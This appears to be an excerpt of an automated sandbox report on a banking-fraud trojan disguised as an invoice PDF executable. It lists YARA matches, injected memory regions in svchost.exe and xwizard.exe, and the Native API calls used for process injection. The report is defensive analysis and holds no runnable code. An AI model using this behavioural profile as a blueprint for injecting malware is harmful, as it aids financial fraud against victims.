                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: initial sampleStatic PE information: Filename: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CBA3 NtClose,2_2_0042CBA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F34650 NtSuspendThread,LdrInitializeThunk,5_2_04F34650
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F34340 NtSetContextThread,LdrInitializeThunk,5_2_04F34340
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04F32CA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04F32C70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32C60 NtCreateKey,LdrInitializeThunk,5_2_04F32C60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04F32DF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32DD0 NtDelayExecution,LdrInitializeThunk,5_2_04F32DD0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04F32D30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04F32D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04F32EE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04F32E80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32FE0 NtCreateFile,LdrInitializeThunk,5_2_04F32FE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32FB0 NtResumeThread,LdrInitializeThunk,5_2_04F32FB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32F30 NtCreateSection,LdrInitializeThunk,5_2_04F32F30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32AF0 NtWriteFile,LdrInitializeThunk,5_2_04F32AF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32AD0 NtReadFile,LdrInitializeThunk,5_2_04F32AD0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04F32BF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04F32BE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04F32BA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32B60 NtClose,LdrInitializeThunk,5_2_04F32B60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F335C0 NtCreateMutant,LdrInitializeThunk,5_2_04F335C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F339B0 NtGetContextThread,LdrInitializeThunk,5_2_04F339B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32CF0 NtOpenProcess,5_2_04F32CF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32CC0 NtQueryVirtualMemory,5_2_04F32CC0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32C00 NtQueryInformationProcess,5_2_04F32C00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32DB0 NtEnumerateKey,5_2_04F32DB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32D00 NtSetInformationFile,5_2_04F32D00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32EA0 NtAdjustPrivilegesToken,5_2_04F32EA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32E30 NtWriteVirtualMemory,5_2_04F32E30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32FA0 NtQuerySection,5_2_04F32FA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32F90 NtProtectVirtualMemory,5_2_04F32F90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32F60 NtCreateProcessEx,5_2_04F32F60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32AB0 NtWaitForSingleObject,5_2_04F32AB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F32B80 NtQueryInformationFile,5_2_04F32B80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F33090 NtSetValueKey,5_2_04F33090
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F33010 NtOpenDirectoryObject,5_2_04F33010
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F33D70 NtOpenThread,5_2_04F33D70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F33D10 NtOpenProcessToken,5_2_04F33D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030292D0 NtCreateFile,5_2_030292D0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_03029720 NtAllocateVirtualMemory,5_2_03029720
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_03029520 NtDeleteFile,5_2_03029520
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030295C0 NtClose,5_2_030295C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_03029430 NtReadFile,5_2_03029430
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBF0A1 NtQueryInformationProcess,5_2_04DBF0A1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004120380_2_00412038
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004271610_2_00427161
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0047E1FA0_2_0047E1FA
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004212BE0_2_004212BE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004433900_2_00443390
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004433910_2_00443391
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0041A46B0_2_0041A46B
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0041240C0_2_0041240C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004465660_2_00446566
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004045E00_2_004045E0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0041D7500_2_0041D750
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004037E00_2_004037E0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004278590_2_00427859
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004128180_2_00412818
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040F8900_2_0040F890
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0042397B0_2_0042397B
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00409A400_2_00409A40
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00411B630_2_00411B63
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0047CBF00_2_0047CBF0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044EBBC0_2_0044EBBC
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00412C380_2_00412C38
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044ED9A0_2_0044ED9A
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00423EBF0_2_00423EBF
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00424F700_2_00424F70
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0041AF0D0_2_0041AF0D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E556700_2_02E55670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C332_2_00418C33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040283C2_2_0040283C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F1532_2_0042F153
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033572_2_00403357
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033602_2_00403360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014C02_2_004014C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004105232_2_00410523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E7E2_2_00416E7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040261F2_2_0040261F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026202_2_00402620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E832_2_00416E83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107432_2_00410743
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7C32_2_0040E7C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027D02_2_004027D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064DD66F4_2_064DD66F
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064FDFFF4_2_064FDFFF
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E448F4_2_064E448F
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E5D2F4_2_064E5D2F
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E5D2A4_2_064E5D2A
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064DF5EF4_2_064DF5EF
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E7ADF4_2_064E7ADF
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064DF3CF4_2_064DF3CF
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FAE4F65_2_04FAE4F6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB24465_2_04FB2446
